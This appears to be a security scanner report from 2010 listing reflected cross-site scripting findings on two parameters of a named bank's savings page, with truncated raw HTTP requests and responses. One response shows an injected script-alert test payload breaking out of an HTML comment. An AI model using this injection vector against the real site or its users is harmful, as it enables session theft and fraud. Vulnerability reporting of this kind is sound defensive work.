1. Cross-site scripting (reflected)
1.1. https://banking.ingdirect.com/savings/initial.vm [openOption parameter]
1.2. https://banking.ingdirect.com/savings/initial.vm [type parameter]
Severity: | High |
Confidence: | Certain |
Host: | https://banking.ingdirect |
Path: | /savings/initial.vm |
GET /savings/initial.vm?type Host: banking.ingdirect.com Connection: keep-alive Referer: http://www.ingdirect.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ING%5FDIRECT%5FUS |
HTTP/1.1 200 OK Connection: close Set-Cookie: JSESSIONID=FFCB516B7 Set-Cookie: ING_DIRECT_US_Promo=%99 Set-Cookie: BIGipServerbanking Server: Apache/2.2.8 (Win32) mod_jk/1.2.26 Content-Language: en-US Content-Type: text/html;charset=ISO Date: Fri, 10 Dec 2010 23:45:49 GMT Content-Length: 74017 ETag: "pv11a3f55e56d1fe06e Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store Pragma: no-cache X-PvInfo: [S10201.C6966.A6526.RA0 <html> <head> <title> Electric Orange </title> <link rel="stylesheet" type="text/css" href=" https://home.ingdirect <link rel="stylesheet" ...[SNIP]... <input type="hidden" name="openOption" id="initialOpenOption" value="ExistingPerso ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://banking.ingdirect |
Path: | /savings/initial.vm |
GET /savings/initial.vm?type Host: banking.ingdirect.com Connection: keep-alive Referer: http://www.ingdirect.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ING%5FDIRECT%5FUS |
HTTP/1.1 200 OK Connection: Keep-Alive Set-Cookie: JSESSIONID=F348E2102 Set-Cookie: BIGipServerbanking Server: Apache/2.2.8 (Win32) mod_jk/1.2.26 Content-Language: en-US Content-Type: text/html;charset=ISO Date: Fri, 10 Dec 2010 23:45:35 GMT Content-Length: 2395 ETag: "pvcddd58d826ab86646 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store Pragma: no-cache X-PvInfo: [S10201.C6966.A6526.RA0 <html> <html> <head> < ;title></title> <link rel="stylesheet" type="text/css" href=" https://home.ingdirect <script language="JavaScript ...[SNIP]... <!--errormsg:For input string: "40003883c--><script>alert(1)< ...[SNIP]... |